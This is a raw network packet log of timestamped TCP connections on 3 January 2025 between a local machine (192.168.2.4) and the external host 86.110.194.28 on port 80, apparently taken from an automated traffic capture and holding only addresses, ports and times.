                                                                                                                                                                        Jan 3, 2025 07:58:18.996679068 CET804985886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.996752977 CET4985880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.996853113 CET4985880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.997404099 CET804985386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.997464895 CET4985380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:19.001883030 CET804985886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:19.355535984 CET4985880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:19.360411882 CET804985886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:19.360429049 CET804985886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:19.360436916 CET804985886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:19.687212944 CET804985886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:19.730530024 CET4985880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:19.824778080 CET804985886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:19.871057034 CET4985880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:19.945970058 CET4985880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:19.945977926 CET4986480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:19.950894117 CET804986486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:19.950994968 CET4986480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:19.951029062 CET804985886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:19.951075077 CET4985880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:19.951108932 CET4986480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:19.955820084 CET804986486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:20.308636904 CET4986480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:20.313608885 CET804986486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:20.313641071 CET804986486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:20.313651085 CET804986486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:20.642127991 CET804986486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:20.683552980 CET4986480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:20.777724981 CET804986486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:20.824177027 CET4986480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:20.923794985 CET4986480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:20.923986912 CET4987080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:20.928813934 CET804987086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:20.929363966 CET804986486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:20.929450989 CET4986480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:20.929619074 CET4987080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:20.929619074 CET4987080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:20.934390068 CET804987086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:21.277426004 CET4987080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:21.282536030 CET804987086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:21.282551050 CET804987086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:21.282562017 CET804987086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:21.662894011 CET804987086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:21.714799881 CET4987080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:21.796560049 CET804987086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:21.839795113 CET4987080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:21.943641901 CET4987080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:21.944555044 CET4987980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:21.948611021 CET804987086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:21.949314117 CET804987986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:21.949384928 CET4987080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:21.949418068 CET4987980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:21.949522972 CET4987980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:21.954247952 CET804987986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:22.308644056 CET4987980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.313462019 CET804987986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:22.313476086 CET804987986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:22.313484907 CET804987986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:22.651259899 CET804987986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:22.699182034 CET4987980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.782488108 CET804987986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:22.839804888 CET4987980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.903460979 CET4987980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.903867006 CET4988680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.908348083 CET804987986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:22.908406973 CET4987980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.908615112 CET804988686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:22.908680916 CET4988680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.908792973 CET4988680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.913561106 CET804988686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:22.935764074 CET4988880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.940597057 CET804988886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:22.940673113 CET4988880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.940787077 CET4988880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:22.945565939 CET804988886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:23.262917042 CET4988680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:23.267755985 CET804988686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:23.267771006 CET804988686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:23.267781019 CET804988686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:23.293240070 CET4988880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:23.298074961 CET804988886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:23.298229933 CET804988886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:23.597631931 CET804988686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:23.638592005 CET804988886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:23.656265974 CET4988680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:23.683557034 CET4988880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:23.728682041 CET804988686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:23.729243994 CET4988880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:23.734241009 CET804988886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:23.734297037 CET4988880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:23.777318001 CET4988680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:31.842557907 CET4995780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:31.842695951 CET4995780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:31.847461939 CET804995786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:32.199467897 CET4995780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:32.225388050 CET804995786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:32.225467920 CET804995786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:32.225595951 CET804995786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:32.531033039 CET804995786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:32.574215889 CET4995780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:32.658910990 CET804995786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:32.714793921 CET4995780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:32.775408030 CET4996380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:32.775466919 CET4995780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:32.780278921 CET804996386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:32.780467033 CET804995786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:32.780549049 CET4995780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:32.780563116 CET4996380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:32.780678988 CET4996380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:32.785522938 CET804996386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:33.136775970 CET4996380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:33.141664982 CET804996386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:33.141678095 CET804996386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:33.141686916 CET804996386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:33.489886045 CET804996386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:33.542941093 CET4996380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:33.624320984 CET804996386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:33.667939901 CET4996380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:33.745124102 CET4996380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:33.745501995 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:33.751379013 CET804996386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:33.751461029 CET4996380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:33.751497984 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:33.751569033 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:33.751686096 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:33.757656097 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.105530024 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.110363960 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.110378027 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.110385895 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.522464037 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.574181080 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.576306105 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.576570034 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.581083059 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.581512928 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.581588984 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.581605911 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.581729889 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.586513996 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.697829962 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.702606916 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.704988003 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.705064058 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.709836006 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.933629036 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.938456059 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.938518047 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.058855057 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.063757896 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.063769102 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.063779116 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.259982109 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.308557034 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.386782885 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.395519018 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.433656931 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.449266911 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.522759914 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.652169943 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.652240038 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.653347969 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.657150984 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.657447100 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.657502890 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.657545090 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.658155918 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.660303116 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.660449982 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.665177107 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.012002945 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.016879082 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.016896009 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.016906023 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.394627094 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.449238062 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.528743029 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.648143053 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.648433924 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.653091908 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.653147936 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.653177023 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.653237104 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.653472900 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.658198118 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.012168884 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.017113924 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.017124891 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.017132044 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.352690935 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.449204922 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.491437912 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.622716904 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.623055935 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.627737045 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.627804995 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.627863884 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.627902031 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.628016949 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.632719040 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.980556011 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.985455036 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.985467911 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.985476017 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.333779097 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.468383074 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.468483925 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:38.591526985 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:38.591775894 CET5000580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:38.596458912 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.686891079 CET5005980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.687063932 CET805006486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.687117100 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.687169075 CET5006480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.687200069 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.687335014 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.692058086 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.043066025 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.047971010 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.047985077 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.047996044 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.371433020 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.449208021 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.500478029 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.651575089 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.796475887 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.796547890 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.801424980 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.801834106 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.801920891 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.801934004 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.802077055 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.806859970 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.152678967 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.157511950 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.157522917 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.157533884 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.507107973 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.558608055 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.636522055 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.683583021 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.791682005 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.796660900 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.796705961 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.797835112 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.802622080 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.802680969 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.802850962 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.807627916 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.152419090 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.157393932 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.157408953 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.157418013 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.488034964 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.624397993 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.626765013 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.745357037 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.745713949 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.750330925 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.750519037 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.750586033 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.750631094 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.750730991 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.755575895 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:50.105673075 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:50.110516071 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:50.110567093 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:50.110577106 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:50.444802046 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:50.496084929 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:50.575366020 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:50.628343105 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:50.835659027 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:50.836342096 CET5008280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:50.840667009 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:50.840744019 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:50.841121912 CET805008286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:50.841187000 CET5008280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:50.841310978 CET5008280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:50.846139908 CET805008286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.199306965 CET5008280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.204188108 CET805008286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.204209089 CET805008286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.204220057 CET805008286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.388484955 CET5008380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.389161110 CET5008280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.393254042 CET805008386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.393407106 CET5008380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.393728018 CET5008380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.394237041 CET805008286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.394325972 CET5008280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.398484945 CET805008386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.533663988 CET5008480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.538445950 CET805008486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.538513899 CET5008480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.538647890 CET5008480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.543375015 CET805008486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.746181965 CET5008380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.751127958 CET805008386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.751363993 CET805008386.110.194.28192.168.2.4
